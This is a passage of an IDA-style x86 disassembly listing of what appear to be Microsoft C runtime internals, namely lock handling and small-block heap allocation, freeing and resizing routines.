cmp esi, offset dword_423920
jl short loc_405902
pop esi
pop ebx
retn
sub_4058CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40591F proc near ; CODE XREF: sub_402ADF+2�p
; sub_403659+2�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push ds:dword_423800[eax*8]
call ds:dword_41D16C
pop ebp
retn
sub_40591F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405934 proc near ; CODE XREF: sub_4059F7+14�p
; sub_4084A1+4F�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_4214D8
call __SEH_prolog4
xor edi, edi
inc edi
mov [ebp+var_1C], edi
xor ebx, ebx
cmp ds:dword_425F68, ebx
jnz short loc_405968
call sub_409C54
push 1Eh
call sub_409AB4
push 0FFh
call sub_4078A7
pop ecx
pop ecx
loc_405968: ; CODE XREF: sub_405934+1A�j
mov esi, [ebp+arg_0]
lea esi, ds:423800h[esi*8]
cmp [esi], ebx
jz short loc_40597A
mov eax, edi
jmp short loc_4059E8
; ---------------------------------------------------------------------------
loc_40597A: ; CODE XREF: sub_405934+40�j
push 18h
call sub_40773A
pop ecx
mov edi, eax
cmp edi, ebx
jnz short loc_405997
call sub_4057D3
mov dword ptr [eax], 0Ch
xor eax, eax
jmp short loc_4059E8
; ---------------------------------------------------------------------------
loc_405997: ; CODE XREF: sub_405934+52�j
push 0Ah
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], ebx
cmp [esi], ebx
jnz short loc_4059D2
push 0FA0h
push edi
call sub_40CB14
pop ecx
pop ecx
test eax, eax
jnz short loc_4059CE
push edi
call sub_403603
pop ecx
call sub_4057D3
mov dword ptr [eax], 0Ch
mov [ebp+var_1C], ebx
jmp short loc_4059D9
; ---------------------------------------------------------------------------
loc_4059CE: ; CODE XREF: sub_405934+81�j
mov [esi], edi
jmp short loc_4059D9
; ---------------------------------------------------------------------------
loc_4059D2: ; CODE XREF: sub_405934+70�j
push edi
call sub_403603
pop ecx
loc_4059D9: ; CODE XREF: sub_405934+98�j
; sub_405934+9C�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4059EE
mov eax, [ebp+var_1C]
loc_4059E8: ; CODE XREF: sub_405934+44�j
; sub_405934+61�j
call __SEH_epilog4
retn
sub_405934 endp
; =============== S U B R O U T I N E =======================================
sub_4059EE proc near ; CODE XREF: sub_405934+AC�p
; DATA XREF: seg001:004214F0�o
push 0Ah
call sub_40591F
pop ecx
retn
sub_4059EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4059F7 proc near ; CODE XREF: sub_402A45+44�p
; sub_403603+1E�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
lea esi, ds:423800h[eax*8]
cmp dword ptr [esi], 0
jnz short loc_405A1D
push eax
call sub_405934
test eax, eax
pop ecx
jnz short loc_405A1D
push 11h
call sub_40785D
pop ecx
loc_405A1D: ; CODE XREF: sub_4059F7+11�j
; sub_4059F7+1C�j
push dword ptr [esi]
call ds:dword_41D168
pop esi
pop ebp
retn
sub_4059F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405A28 proc near ; CODE XREF: sub_405A83:loc_405AA6�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
lea eax, [ebp+var_4]
xor esi, esi
push eax
mov [ebp+var_4], esi
mov [ebp+var_8], esi
call sub_407906
test eax, eax
pop ecx
jz short loc_405A51
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_405A51: ; CODE XREF: sub_405A28+1A�j
lea eax, [ebp+var_8]
push eax
call sub_40793D
test eax, eax
pop ecx
jz short loc_405A6C
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_405A6C: ; CODE XREF: sub_405A28+35�j
cmp [ebp+var_4], 2
pop esi
jnz short loc_405A7E
cmp [ebp+var_8], 5
jb short loc_405A7E
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_405A7E: ; CODE XREF: sub_405A28+49�j
; sub_405A28+4F�j
push 3
pop eax
leave
retn
sub_405A28 endp
; =============== S U B R O U T I N E =======================================
sub_405A83 proc near ; CODE XREF: seg000:00404009�p
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
push 0
setz al
push 1000h
push eax
call ds:dword_41D160
test eax, eax
mov ds:dword_425F68, eax
jnz short loc_405AA6
loc_405AA3: ; CODE XREF: sub_405A83+54�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_405AA6: ; CODE XREF: sub_405A83+1E�j
call sub_405A28
cmp eax, 3
mov ds:dword_434DF4, eax
jnz short loc_405AD9
push 3F8h
call sub_405ADD
test eax, eax
pop ecx
jnz short loc_405AD9
push ds:dword_425F68
call ds:dword_41D164
and ds:dword_425F68, 0
jmp short loc_405AA3
; ---------------------------------------------------------------------------
loc_405AD9: ; CODE XREF: sub_405A83+30�j
; sub_405A83+3F�j
xor eax, eax
inc eax
retn
sub_405A83 endp
; =============== S U B R O U T I N E =======================================
sub_405ADD proc near ; CODE XREF: sub_405A83+37�p
arg_0 = dword ptr 4
push 140h
push 0
push ds:dword_425F68
call ds:dword_41D114
test eax, eax
mov ds:dword_434DE0, eax
jnz short loc_405AFA
retn
; ---------------------------------------------------------------------------
loc_405AFA: ; CODE XREF: sub_405ADD+1A�j
mov ecx, [esp+arg_0]
and ds:dword_425F6C, 0
and ds:dword_434DDC, 0
mov ds:dword_434DE8, eax
xor eax, eax
mov ds:dword_434DE4, ecx
mov ds:dword_434DEC, 10h
inc eax
retn
sub_405ADD endp
; =============== S U B R O U T I N E =======================================
sub_405B25 proc near ; CODE XREF: sub_402A45+4E�p
; sub_403603+29�p ...
arg_0 = dword ptr 4
mov ecx, ds:dword_434DDC
mov eax, ds:dword_434DE0
imul ecx, 14h
add ecx, eax
jmp short loc_405B49
; ---------------------------------------------------------------------------
loc_405B37: ; CODE XREF: sub_405B25+26�j
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_405B4F
add eax, 14h
loc_405B49: ; CODE XREF: sub_405B25+10�j
cmp eax, ecx
jb short loc_405B37
xor eax, eax
locret_405B4F: ; CODE XREF: sub_405B25+1F�j
retn
sub_405B25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405B50 proc near ; CODE XREF: sub_403603+38�p
; sub_40DA6D+B5�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, esi
sub edi, [ecx+0Ch]
add esi, 0FFFFFFFCh
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_405E60
push ebx
lea ebx, [ecx+esi]
mov edx, [ebx]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_405C1B
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_405BB3
push 3Fh
pop edx
loc_405BB3: ; CODE XREF: sub_405B50+5E�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_405BFD
cmp edx, 20h
mov ebx, 80000000h
jnb short loc_405BDE
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_405BFA
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_405BFA
; ---------------------------------------------------------------------------
loc_405BDE: ; CODE XREF: sub_405B50+73�j
lea ecx, [edx-20h]
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_405BFA
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_405BFA: ; CODE XREF: sub_405B50+85�j
; sub_405B50+8C�j ...
mov ebx, [ebp+arg_4]
loc_405BFD: ; CODE XREF: sub_405B50+69�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
mov [ebp+var_4], ecx
loc_405C1B: ; CODE XREF: sub_405B50+55�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_405C29
push 3Fh
pop edx
loc_405C29: ; CODE XREF: sub_405B50+D4�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_405CC7
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_405C4E
mov ebx, esi
loc_405C4E: ; CODE XREF: sub_405B50+FA�j
add ecx, [ebp+var_8]
mov edx, ecx
sar edx, 4
dec edx
cmp edx, esi
mov [ebp+var_4], ecx
jbe short loc_405C60
mov edx, esi
loc_405C60: ; CODE XREF: sub_405B50+10C�j
cmp ebx, edx
jz short loc_405CC2
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_405CAA
cmp ebx, 20h
mov esi, 80000000h
jnb short loc_405C90
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_405CAA
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_405CAA
; ---------------------------------------------------------------------------
loc_405C90: ; CODE XREF: sub_405B50+127�j
lea ecx, [ebx-20h]
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_405CAA
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_405CAA: ; CODE XREF: sub_405B50+11D�j
; sub_405B50+137�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_405CC2: ; CODE XREF: sub_405B50+112�j
mov esi, [ebp+arg_4]
jmp short loc_405CCA
; ---------------------------------------------------------------------------
loc_405CC7: ; CODE XREF: sub_405B50+E2�j
mov ebx, [ebp+arg_0]
loc_405CCA: ; CODE XREF: sub_405B50+175�j
cmp [ebp+var_C], 0
jnz short loc_405CD8
cmp ebx, edx
jz loc_405D58
loc_405CD8: ; CODE XREF: sub_405B50+17E�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edx*8]
mov ebx, [ecx+4]
mov [esi+8], ecx
mov [esi+4], ebx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_405D58
mov cl, [edx+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp edx, 20h
mov [edx+eax+4], cl
jnb short loc_405D2F
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_405D1E
mov ecx, edx
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_405D1E: ; CODE XREF: sub_405B50+1BE�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_405D58
; ---------------------------------------------------------------------------
loc_405D2F: ; CODE XREF: sub_405B50+1B8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_405D45
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_405D45: ; CODE XREF: sub_405B50+1E3�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_405D58: ; CODE XREF: sub_405B50+182�j
; sub_405B50+1A6�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_405E5F
mov eax, ds:dword_425F6C
test eax, eax
jz loc_405E51
mov ecx, ds:dword_434DF0
mov esi, ds:dword_41D15C
push 4000h
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push ebx
push ecx
call esi
mov ecx, ds:dword_434DF0
mov eax, ds:dword_425F6C
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, ds:dword_425F6C
mov eax, [eax+10h]
mov ecx, ds:dword_434DF0
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, ds:dword_425F6C
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, ds:dword_425F6C
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_405DE6
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, ds:dword_425F6C
loc_405DE6: ; CODE XREF: sub_405B50+28B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_405E51
push ebx
push 0
push dword ptr [eax+0Ch]
call esi
mov eax, ds:dword_425F6C
push dword ptr [eax+10h]
push 0
push ds:dword_425F68
call ds:dword_41D10C
mov ecx, ds:dword_434DDC
mov eax, ds:dword_425F6C
imul ecx, 14h
mov edx, ds:dword_434DE0
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_407370
mov eax, [ebp+arg_0]
add esp, 0Ch
dec ds:dword_434DDC
cmp eax, ds:dword_425F6C
jbe short loc_405E47
sub [ebp+arg_0], 14h
loc_405E47: ; CODE XREF: sub_405B50+2F1�j
mov eax, ds:dword_434DE0
mov ds:dword_434DE8, eax
loc_405E51: ; CODE XREF: sub_405B50+223�j
; sub_405B50+29A�j
mov eax, [ebp+arg_0]
mov ds:dword_425F6C, eax
mov ds:dword_434DF0, edi
loc_405E5F: ; CODE XREF: sub_405B50+216�j
pop ebx
loc_405E60: ; CODE XREF: sub_405B50+37�j
pop edi
pop esi
leave
retn
sub_405B50 endp
; =============== S U B R O U T I N E =======================================
sub_405E64 proc near ; CODE XREF: sub_4062F9+C0�p
mov eax, ds:dword_434DEC
push esi
mov esi, ds:dword_434DDC
push edi
xor edi, edi
cmp esi, eax
jnz short loc_405EAB
add eax, 10h
imul eax, 14h
push eax
push ds:dword_434DE0
push edi
push ds:dword_425F68
call ds:dword_41D154
cmp eax, edi
jnz short loc_405E99
loc_405E95: ; CODE XREF: sub_405E64+68�j
; sub_405E64+94�j
xor eax, eax
jmp short loc_405F11
; ---------------------------------------------------------------------------
loc_405E99: ; CODE XREF: sub_405E64+2F�j
add ds:dword_434DEC, 10h
mov esi, ds:dword_434DDC
mov ds:dword_434DE0, eax
loc_405EAB: ; CODE XREF: sub_405E64+11�j
imul esi, 14h
add esi, ds:dword_434DE0
push 41C4h
push 8
push ds:dword_425F68
call ds:dword_41D114
cmp eax, edi
mov [esi+10h], eax
jz short loc_405E95
push 4
push 2000h
push 100000h
push edi
call ds:dword_41D158
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_405EFA
push dword ptr [esi+10h]
push edi
push ds:dword_425F68
call ds:dword_41D10C
jmp short loc_405E95
; ---------------------------------------------------------------------------
loc_405EFA: ; CODE XREF: sub_405E64+82�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc ds:dword_434DDC
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_405F11: ; CODE XREF: sub_405E64+33�j
pop edi
pop esi
retn
sub_405E64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405F14 proc near ; CODE XREF: sub_4062F9+D6�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov ecx, [ebp+arg_0]
mov eax, [ecx+8]
push ebx
push esi
mov esi, [ecx+10h]
push edi
xor ebx, ebx
jmp short loc_405F2C
; ---------------------------------------------------------------------------
loc_405F29: ; CODE XREF: sub_405F14+1A�j
add eax, eax
inc ebx
loc_405F2C: ; CODE XREF: sub_405F14+13�j
test eax, eax
jge short loc_405F29
mov eax, ebx
imul eax, 204h
lea eax, [eax+esi+144h]
push 3Fh
mov [ebp+var_8], eax
pop edx
loc_405F45: ; CODE XREF: sub_405F14+3B�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_405F45
push 4
mov edi, ebx
push 1000h
shl edi, 0Fh
add edi, [ecx+0Ch]
push 8000h
push edi
call ds:dword_41D158
test eax, eax
jnz short loc_405F78
or eax, 0FFFFFFFFh
jmp loc_406015
; ---------------------------------------------------------------------------
loc_405F78: ; CODE XREF: sub_405F14+5A�j
lea edx, [edi+7000h]
cmp edi, edx
mov [ebp+var_4], edx
ja short loc_405FC8
mov ecx, edx
sub ecx, edi
shr ecx, 0Ch
lea eax, [edi+10h]
inc ecx
loc_405F90: ; CODE XREF: sub_405F14+AF�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea edx, [eax+0FFCh]
mov [eax], edx
lea edx, [eax-1004h]
mov dword ptr [eax-4], 0FF0h
mov [eax+4], edx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
dec ecx
jnz short loc_405F90
mov edx, [ebp+var_4]
loc_405FC8: ; CODE XREF: sub_405F14+6F�j
mov eax, [ebp+var_8]
add eax, 1F8h
lea ecx, [edi+0Ch]
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
xor edi, edi
inc edi
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_406005
or [eax+4], edi
loc_406005: ; CODE XREF: sub_405F14+EC�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_406015: ; CODE XREF: sub_405F14+5F�j
pop edi
pop esi
pop ebx
leave
retn
sub_405F14 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40601A proc near ; CODE XREF: sub_40DA6D+77�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov edx, edi
sub edx, [ecx+0Ch]
add esi, 17h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
and esi, 0FFFFFFF0h
dec ecx
cmp esi, ecx
lea edi, [ecx+edi-4]
mov ebx, [edi]
mov [ebp+arg_8], ecx
mov [ebp+var_4], ebx
jle loc_4061BC
test bl, 1
jnz loc_4061B5
add ebx, ecx
cmp esi, ebx
jg loc_4061B5
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_40608F
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_40608F: ; CODE XREF: sub_40601A+6D�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_4060DA
cmp ecx, 20h
mov ebx, 80000000h
jnb short loc_4060BB
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_4060DA
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_4060DA
; ---------------------------------------------------------------------------
loc_4060BB: ; CODE XREF: sub_40601A+85�j
add ecx, 0FFFFFFE0h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_4060DA
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_4060DA: ; CODE XREF: sub_40601A+7B�j
; sub_40601A+98�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_4061A3
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
cmp edi, 3Fh
lea ecx, [ecx+esi-4]
jbe short loc_406114
push 3Fh
pop edi
loc_406114: ; CODE XREF: sub_40601A+F5�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_406191
mov cl, [edi+eax+4]
mov byte ptr [ebp+arg_8+3], cl
inc cl
cmp edi, 20h
mov [edi+eax+4], cl
jnb short loc_406168
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_406160
mov ecx, edi
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_406160: ; CODE XREF: sub_40601A+136�j
lea eax, [eax+edx*4+44h]
mov ecx, edi
jmp short loc_406188
; ---------------------------------------------------------------------------
loc_406168: ; CODE XREF: sub_40601A+130�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_40617E
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_40617E: ; CODE XREF: sub_40601A+152�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
loc_406188: ; CODE XREF: sub_40601A+14C�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_406191: ; CODE XREF: sub_40601A+11E�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_4061A6
; ---------------------------------------------------------------------------
loc_4061A3: ; CODE XREF: sub_40601A+DE�j
mov edx, [ebp+arg_4]
loc_4061A6: ; CODE XREF: sub_40601A+187�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_4062F1
; ---------------------------------------------------------------------------
loc_4061B5: ; CODE XREF: sub_40601A+50�j
; sub_40601A+5A�j
xor eax, eax
jmp loc_4062F4
; ---------------------------------------------------------------------------
loc_4061BC: ; CODE XREF: sub_40601A+47�j
jge loc_4062F1
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+arg_4], ebx
mov [ebx-4], ecx
jbe short loc_4061E7
push 3Fh
pop esi
loc_4061E7: ; CODE XREF: sub_40601A+1C8�j
test byte ptr [ebp+var_4], 1
jnz loc_406271
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_406200
push 3Fh
pop esi
loc_406200: ; CODE XREF: sub_40601A+1E1�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_40624A
cmp esi, 20h
mov ebx, 80000000h
jnb short loc_40622B
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_406247
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_406247
; ---------------------------------------------------------------------------
loc_40622B: ; CODE XREF: sub_40601A+1F6�j
lea ecx, [esi-20h]
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_406247
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_406247: ; CODE XREF: sub_40601A+208�j
; sub_40601A+20F�j ...
mov ebx, [ebp+arg_4]
loc_40624A: ; CODE XREF: sub_40601A+1EC�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov esi, [edi+8]
mov ecx, [edi+4]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_406271
push 3Fh
pop esi
loc_406271: ; CODE XREF: sub_40601A+1D1�j
; sub_40601A+252�j
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [ebx+8], ecx
mov [ebx+4], edi
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_4062E8
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jnb short loc_4062BF
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_4062B7
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_4062B7: ; CODE XREF: sub_40601A+28D�j
lea eax, [eax+edx*4+44h]
mov ecx, esi
jmp short loc_4062DF
; ---------------------------------------------------------------------------
loc_4062BF: ; CODE XREF: sub_40601A+287�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_4062D5
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_4062D5: ; CODE XREF: sub_40601A+2A9�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
loc_4062DF: ; CODE XREF: sub_40601A+2A3�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_4062E8: ; CODE XREF: sub_40601A+275�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_4062F1: ; CODE XREF: sub_40601A+196�j
; sub_40601A:loc_4061BC�j
xor eax, eax
inc eax
loc_4062F4: ; CODE XREF: sub_40601A+19D�j
pop edi
pop esi
pop ebx
leave
retn
sub_40601A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4062F9 proc near ; CODE XREF: sub_403691+28�p
; sub_40D94F+88�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, ds:dword_434DDC
mov ecx, [ebp+arg_0]
imul eax, 14h
add eax, ds:dword_434DE0
add ecx, 17h
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
push ebx
dec ecx
cmp ecx, 20h
push esi
push edi
jge short loc_406330
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_40633D
; ---------------------------------------------------------------------------
loc_406330: ; CODE XREF: sub_4062F9+2A�j
add ecx, 0FFFFFFE0h
or edx, 0FFFFFFFFh
xor esi, esi
shr edx, cl
mov [ebp+var_8], edx
loc_40633D: ; CODE XREF: sub_4062F9+35�j
mov ecx, ds:dword_434DE8
mov ebx, ecx
jmp short loc_406358
; ---------------------------------------------------------------------------
loc_406347: ; CODE XREF: sub_4062F9+64�j
mov edx, [ebx+4]
mov edi, [ebx]
and edx, [ebp+var_8]
and edi, esi
or edx, edi
jnz short loc_40635F
add ebx, 14h
loc_406358: ; CODE XREF: sub_4062F9+4C�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_406347
loc_40635F: ; CODE XREF: sub_4062F9+5A�j
cmp ebx, eax
jnz short loc_4063E2
mov ebx, ds:dword_434DE0
jmp short loc_40637C
; ---------------------------------------------------------------------------
loc_40636B: ; CODE XREF: sub_4062F9+88�j
mov edx, [ebx+4]
mov edi, [ebx]
and edx, [ebp+var_8]
and edi, esi
or edx, edi
jnz short loc_406383
add ebx, 14h
loc_40637C: ; CODE XREF: sub_4062F9+70�j
cmp ebx, ecx
mov [ebp+arg_0], ebx
jb short loc_40636B
loc_406383: ; CODE XREF: sub_4062F9+7E�j
cmp ebx, ecx
jnz short loc_4063E2
jmp short loc_406395
; ---------------------------------------------------------------------------
loc_406389: ; CODE XREF: sub_4062F9+9E�j
cmp dword ptr [ebx+8], 0
jnz short loc_406399
add ebx, 14h
mov [ebp+arg_0], ebx
loc_406395: ; CODE XREF: sub_4062F9+8E�j
cmp ebx, eax
jb short loc_406389
loc_406399: ; CODE XREF: sub_4062F9+94�j
cmp ebx, eax
jnz short loc_4063CE
mov ebx, ds:dword_434DE0
jmp short loc_4063AE
; ---------------------------------------------------------------------------
loc_4063A5: ; CODE XREF: sub_4062F9+BA�j
cmp dword ptr [ebx+8], 0
jnz short loc_4063B5
add ebx, 14h
